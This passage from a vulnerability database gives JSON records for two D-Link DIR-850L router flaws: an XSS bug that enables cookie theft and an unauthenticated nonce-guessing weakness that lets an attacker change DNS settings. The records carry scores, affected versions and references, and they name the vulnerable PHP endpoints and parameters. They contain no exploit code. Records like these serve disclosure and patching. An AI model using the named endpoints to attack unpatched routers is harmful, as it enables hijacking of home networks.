"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14413"
}
]
},
"cve": "CVE-2017-14413",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14413",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31796",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-105133",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-14413",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14413",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-31796",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-582",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-105133",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"db": "VULHUB",
"id": "VHN-105133"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wpsacts.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \\342\\200\\230action\\342\\200\\231 parameter to the htdocs/web/wandetect.php file",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"db": "VULHUB",
"id": "VHN-105133"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14413",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-582",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31796",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105133",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"db": "VULHUB",
"id": "VHN-105133"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"id": "VAR-201709-0584",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"db": "VULHUB",
"id": "VHN-105133"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31796"
}
]
},
"last_update_date": "2023-12-18T14:01:29.334000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235007"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105133"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "NVD",
"id": "CVE-2017-14413"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14413"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14413"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"db": "VULHUB",
"id": "VHN-105133"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"db": "VULHUB",
"id": "VHN-105133"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105133"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"date": "2017-09-13T17:29:00.197000",
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31796"
},
{
"date": "2017-09-20T00:00:00",
"db": "VULHUB",
"id": "VHN-105133"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008094"
},
{
"date": "2023-11-08T20:20:49.637000",
"db": "NVD",
"id": "CVE-2017-14413"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Cross-site scripting vulnerability in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008094"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-582"
}
],
"trust": 0.6
}
}
VAR-201709-0594
Vulnerability from variot - Updated: 2023-12-18 13:57htdocs/parentalcontrols/bind.php on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices does not prevent unauthenticated nonce-guessing attacks, which makes it easier for remote attackers to change the DNS configuration via a series of requests. D-Link DIR-850L The device firmware contains vulnerabilities related to security functions.Information may be tampered with. D-LinkDIR-850LREV.A is a wireless router from D-Link
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0594",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14423"
}
]
},
"cve": "CVE-2017-14423",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14423",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-31786",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-105144",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14423",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14423",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-31786",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-572",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-105144",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"db": "VULHUB",
"id": "VHN-105144"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "htdocs/parentalcontrols/bind.php on D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices does not prevent unauthenticated nonce-guessing attacks, which makes it easier for remote attackers to change the DNS configuration via a series of requests. D-Link DIR-850L The device firmware contains vulnerabilities related to security functions.Information may be tampered with. D-LinkDIR-850LREV.A is a wireless router from D-Link",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"db": "VULHUB",
"id": "VHN-105144"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14423",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-572",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31786",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105144",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"db": "VULHUB",
"id": "VHN-105144"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"id": "VAR-201709-0594",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"db": "VULHUB",
"id": "VHN-105144"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31786"
}
]
},
"last_update_date": "2023-12-18T13:57:16.233000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV. A Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100052"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-307",
"trust": 1.1
},
{
"problemtype": "CWE-254",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105144"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "NVD",
"id": "CVE-2017-14423"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14423"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14423"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"db": "VULHUB",
"id": "VHN-105144"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"db": "VULHUB",
"id": "VHN-105144"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105144"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"date": "2017-09-13T17:29:00.603000",
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"date": "2017-09-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31786"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-105144"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008109"
},
{
"date": "2023-11-08T21:00:01.197000",
"db": "NVD",
"id": "CVE-2017-14423"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Vulnerabilities related to security functions in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008109"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-572"
}
],
"trust": 0.6
}
}
VAR-201709-0590
